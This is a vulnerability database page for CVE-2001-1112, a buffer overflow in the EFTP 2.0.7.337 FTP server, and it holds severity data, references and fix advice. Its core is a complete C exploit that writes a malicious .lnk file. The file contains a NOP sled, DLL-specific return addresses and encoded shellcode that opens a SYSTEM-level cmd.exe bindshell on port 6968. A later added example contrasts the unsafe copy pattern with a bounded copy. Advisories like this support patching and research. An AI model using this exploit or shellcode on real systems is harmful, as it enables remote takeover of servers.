CVE-2001-1112
CVSS 7.5
Published: 2001-09-12 00:00:00
Revised: 2008-09-05 16:25:43

[Original] Buffer overflow in EFTP 2.0.7.337 allows remote attackers to execute arbitrary code by uploading a .lnk file containing a large number of characters.


[CNNVD] EFTP Buffer Overflow Code Execution and Denial of Service Vulnerability (CNNVD-200109-045)

A buffer overflow vulnerability exists in EFTP 2.0.7.337. A remote attacker can execute arbitrary code by uploading a .lnk file containing a large number of characters.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1112
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1112
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-045
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/7115.php
(VENDOR_ADVISORY)  XF  eftp-lnk-bo(7115)
http://www.securityfocus.com/bid/3330
(VENDOR_ADVISORY)  BID  3330
http://www.securityfocus.com/archive/1/213647
(VENDOR_ADVISORY)  BUGTRAQ  20010912 EFTP Version 2.0.7.337 vulnerabilities

- Vulnerability information

EFTP Buffer Overflow Code Execution and Denial of Service Vulnerability
High severity  Buffer overflow
2001-09-12 00:00:00 2005-10-20 00:00:00
Remote
A buffer overflow vulnerability exists in EFTP 2.0.7.337. A remote attacker can execute arbitrary code by uploading a .lnk file containing a large number of characters.

- Advisories and patches

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (21109)

EFTP 2.0.7 .337 Buffer Overflow Code Execution and Denial of Service Vulnerability (EDBID:21109)
windows remote
2001-09-12 Verified
0 byterage
N/A
source: http://www.securityfocus.com/bid/3330/info

Encrypted FTP (EFTP) is both an FTP client and server application for Windows platforms.

A malicious user with upload permissions to the target host can cause a buffer overflow in EFTP to execute code of the attacker's choosing. The attacker can potentially use this exploit to open a bindshell on the target host. Another possible result of this exploit is a denial of service. 

/***************************************************************
 * EFTP Version 2.0.7.337 remote exploit                       *
 *                                                             *
 * create spl0it.lnk                                           *
 * upload the file using the EFTP client                       *
 * (since I'm not planning to rewrite that blowfish crypto)    *
 * then issue an LS command on the server                      *
 *                                                             *
 * impact: SYSTEM level access CMD.EXE shell on port 6968      *
 *                                                             *
 * [ByteRage] <byterage@yahoo.com> http://www.byterage.cjb.net *
 ***************************************************************/

#include <stdio.h>

#define FileName "spl0it.lnk"

/* You should set the following three consts according
 * to the DLL you are basing the exploit upon, examples :
 *********************************************
 * DLL Name    : MSVCRT.DLL
 * Version     : v6.00.8797.0000
 * File Length : 278581 bytes
 * newEIP =             "\x1C\xDF\x01\x78" (*)
 * LoadLibraryRef       "\xD4\x10\x03\x78"
 * GetProcAddressRefADD "\xFC"
 *********************************************
 * DLL Name    : MSVCRT.DLL
 * Version     : v6.00.8397.0000
 * File Length : 266293 bytes
 * newEIP =             "\x55\xE4\x01\x78" (*)
 * LoadLibraryRef       "\xD4\xE0\x02\x78"
 * GetProcAddressRefADD "\xFC"
 *********************************************
 * (*) the new EIP must CALL/JMP/... either
 *     EAX or EBX
 */
const char * newEIP =        "\x55\xE4\x01\x78";
#define LoadLibraryRef       "\xD4\xE0\x02\x78"
#define GetProcAddressRefADD "\xFC"

/* The following 452b shellcode
 * spawns a cmd.exe shell on port 6968
 * and is a personal rewrite of
 * dark spyrit's original code
 */

/* ==== SHELLC0DE START ==== */

const char shellc0de[] =  

/* CODE: */
"\x8b\xf0\xac\x84\xc0\x75\xfb\x8b\xfe\x33\xc9\xb1\xc1\x4e\x80\x36"
"\x99\xe2\xfa\xbb" LoadLibraryRef "\x56\xff\x13\x95\xac\x84\xc0\x75"
"\xfb\x56\x55\xff\x53" GetProcAddressRefADD "\xab\xac\x84\xc0\x75\xfb\xac\x3c\x21\x74"
"\xe7\x72\x03\x4e\xeb\xeb\x33\xed\x55\x6a\x01\x6a\x02\xff\x57\xe8"
"\x93\x6a\x10\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0"
"\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x55\x57\x56\xad\x56\xff"
"\x57\xc0\x55\x57\xad\x56\xad\x56\xff\x57\xc0\xb0\x44\x89\x07\x57"
"\xff\x57\xc4\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\xad\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xb8\x01\x01\x89\x47\x2c\x57\x57\x55\x55"
"\x55\x6a\x01\x55\x55\x56\x55\xff\x57\xc8\xff\x76\xf0\xff\x57\xcc"
"\xff\x76\xfc\xff\x57\xcc\x55\x55\x53\xff\x57\xf4\x93\x33\xc0\xb4"
"\x04\x50\x6a\x40\xff\x57\xd4\x96\x6a\x50\xff\x57\xe0\x8b\xcd\xb5"
"\x04\x55\x55\x57\x51\x56\xff\x77\xaf\xff\x57\xd0\x8b\x0f\xe3\x18"
"\x55\x57\x51\x56\xff\x77\xaf\xff\x57\xdc\x0b\xc0\x74\x21\x55\xff"
"\x37\x56\x53\xff\x57\xf8\xeb\xd0\x33\xc0\x50\xb4\x04\x50\x56\x53"
"\xff\x57\xfc\x55\x57\x50\x56\xff\x77\xb3\xff\x57\xd8\xeb\xb9\xff"
"\x57\xe4"

/* DATA: (XORed with 099) */
"\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9"
"\xf0\xe9\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7"
"\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea"
"\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9"
"\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6"
"\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc\xdf\xf0"
"\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc"
"\xe9\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xb8\xce"
"\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0"
"\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x99\x9b\x99\x82\xa1"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\x99"

"\x00";

/* ==== SHELLC0DE ENDS ==== */

int i;

FILE *file;

int main ()
{
  
  printf("EFTP Version 2.0.7.337 remote exploit by [ByteRage]\n");

  file = fopen(FileName, "w+b");
  if (!file) {
    printf("ERROR! Couldn't open " FileName " for output !\n");
    return 1;
  }
  
  for (i=0; i<1740; i++) { fwrite("\x90", 1, 1, file); }
  fwrite("\xEB\x06\x90\x90", 1, 4, file);  
  fwrite(newEIP, 1, 4, file); 
  fwrite(shellc0de, 1, sizeof(shellc0de)-1, file);

  fclose(file);

  printf(FileName " created! (Shellcode length: %i bytes)\n", (int)sizeof(shellc0de));
  return 0;

}		

- Vulnerability information

764
EFTP .lnk File Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in EFTP. The server fails to sanitize input provided to the 'ls' command resulting in a buffer overflow. With a specially crafted .lnk file uploaded to the server, an attacker can cause arbitrary code execution resulting in a loss of integrity.
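The unbounded-copy pattern this description implies, beside a bounded, validating replacement, as an added example in C; this is not EFTP's code or anything from the advisory. It assumes a MAX_PATH-sized destination buffer, treats everything after the 20-byte Shell Link header as the string the listing code copies (a simplification of the real LNK layout), and the function and sample names are hypothetical.

```c
#include <string.h>

#define LNK_TARGET_MAX 260   /* assumed fixed-size destination buffer, MAX_PATH-like */

/* First 20 bytes of a well-formed Shell Link file (MS-SHLLINK): HeaderSize 0x4C followed by
 * the LNK CLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order. */
static const unsigned char LNK_MAGIC[20] = {
    0x4C,0x00,0x00,0x00, 0x01,0x14,0x02,0x00, 0x00,0x00,0x00,0x00,
    0xC0,0x00,0x00,0x00, 0x00,0x00,0x00,0x46 };

/* The pattern the advisory describes: an unbounded copy of shortcut data into a fixed stack
 * buffer. Shown for contrast only; nothing in this example calls it. */
void vulnerable_copy(const char *shortcut_data) {
    char target[LNK_TARGET_MAX];
    strcpy(target, shortcut_data);   /* 1740+ bytes run past the frame and the saved return address */
    (void)target;
}

/* Check 1: does the upload even look like a shortcut? Returns 1 if yes, 0 otherwise. */
int lnk_header_ok(const unsigned char *buf, size_t len) {
    return len >= sizeof LNK_MAGIC && memcmp(buf, LNK_MAGIC, sizeof LNK_MAGIC) == 0;
}

/* Check 2: bounded copy that rejects oversized input instead of truncating or overrunning.
 * Returns 0 on success (dst NUL-terminated), -1 on rejection. */
int copy_lnk_target(char *dst, size_t dstlen, const unsigned char *src, size_t srclen) {
    if (dst == NULL || dstlen == 0 || srclen >= dstlen) return -1;
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 0;
}

/* What a hardened 'ls' handler would call: validate the header, then copy the remainder
 * (treated as the target string, a simplification of the real LNK layout) into a bounded buffer. */
int check_upload(const unsigned char *buf, size_t len, char *out, size_t outlen) {
    if (!lnk_header_ok(buf, len)) return -1;
    return copy_lnk_target(out, outlen, buf + sizeof LNK_MAGIC, len - sizeof LNK_MAGIC);
}

/* Constructed sample: valid header plus a short target string. Returns bytes written. */
size_t make_valid_sample(unsigned char *buf, size_t buflen) {
    static const char payload[] = "C:\\shared\\readme.txt";
    size_t n = sizeof LNK_MAGIC + sizeof payload - 1;
    if (buflen < n) return 0;
    memcpy(buf, LNK_MAGIC, sizeof LNK_MAGIC);
    memcpy(buf + sizeof LNK_MAGIC, payload, sizeof payload - 1);
    return n;
}
```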

- Timeline

2001-09-12 Unknown
2001-09-12 Unknown

- Solution

Upgrade to version 3.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

EFTP Buffer Overflow Code Execution and Denial of Service Vulnerability
Boundary Condition Error 3330
Yes No
2001-09-12 12:00:00 2009-07-11 07:56:00
This vulnerability was posted to BugTraq by ByteRage <byterage@yahoo.com>.

- Affected program versions

Khamil Landross and Zack Jones EFTP 2.0.7 .337
+ Cisco iCDN 2.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- Vulnerability discussion

Encrypted FTP (EFTP) is both an FTP client and server application for Windows platforms.

A malicious user with upload permissions to the target host can cause a buffer overflow in EFTP to execute code of the attacker's choosing. The attacker can potentially use this exploit to open a bindshell on the target host. Another possible result of this exploit is a denial of service.

- Exploit

The following exploit code was provided by ByteRage <byterage@yahoo.com>

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- References